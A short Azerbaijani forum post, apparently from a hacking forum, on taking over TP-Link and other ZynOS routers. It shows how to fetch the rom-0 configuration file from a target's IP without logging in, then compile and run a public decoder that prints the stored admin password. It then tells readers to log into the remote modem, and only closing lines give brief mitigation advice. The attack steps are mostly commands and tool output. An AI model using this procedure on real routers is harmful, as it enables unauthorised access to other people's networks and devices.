Belə bir kritiki metod da var)
Əksər routerlərdə (xüsusilə partd*ğ TP-linklərdə) işləkdir.
1-ci kritiki boşluq TP-linklərdə rom-0 -ı unautorized şəkildə download etməl olur.
2-ci bu download etdiyiniz rom-0 -da parollar saxlanılır!
http://piotrbania.com/all/utils/RomDecoder.c
Yükləyirik və Linuxda kompilə edirik:
Kod:
[blackhat@localhost ~]$ cd ~/Downloads/
[blackhat@localhost Downloads]$ gcc RomDecoder.c -o fuck
[blackhat@localhost Downloads]$ chmod u+x fuck
[blackhat@localhost Downloads]$ ./fuck
--------------------------------------------
zynos rom-0 config password retriever
http://piotrbania.com - @piotrbania
--------------------------------------------
Usage: rom0decoder <path_to_rom0_file>
Hədəfin rom-0 ını download edirik:
http://REMOIP/rom-0
yaxud Lokal şəbəkədədirsə:
http://LOCAL_IP/rom-0
və
işə başlayırıq.
Kod:
[blackhat@localhost Downloads]$ ./fuck rom-0\(1\)
--------------------------------------------
zynos rom-0 config password retriever
http://piotrbania.com - @piotrbania
--------------------------------------------
Trying to retrieve password from "rom-0(1)"
[00] rom_header block offset=0x00001ffc size=0x00000003 name=boot
Not the one we wanted, skipping.
[01] rom_header block offset=0x00000148 size=0x0000000c name=spt.dat
Not the one we wanted, skipping.
[02] rom_header block offset=0x00000168 size=0x00001643 name=autoexec.net
End of stream
Your password is: PAROLBURADA
End of file reached.
Dumped 2048 bytes to "rom-0(1).dat"
All done!
Your password is: PAROLBURADA
-da artıq paroldur.
Login oluruq REMOTE modemə və məqsədəuyğun istifadə edirik.
Gördüyünüz kimi zir-zibil routerlər xüsusilə TP-linklər konkret başbəlasıdırlar.
TP-linklər modeminizə firmware update varsa update edin.
Yoxdursa zibil yeşiyinə layiqdir TP-link getməyə.
Digər müəyyən qarşısını almaq metodu (temporal) şəbəkəni firewall səviyyədə secure etməkdir ki sizdən başqa heç kimi access almasın routerin interfeysinə.
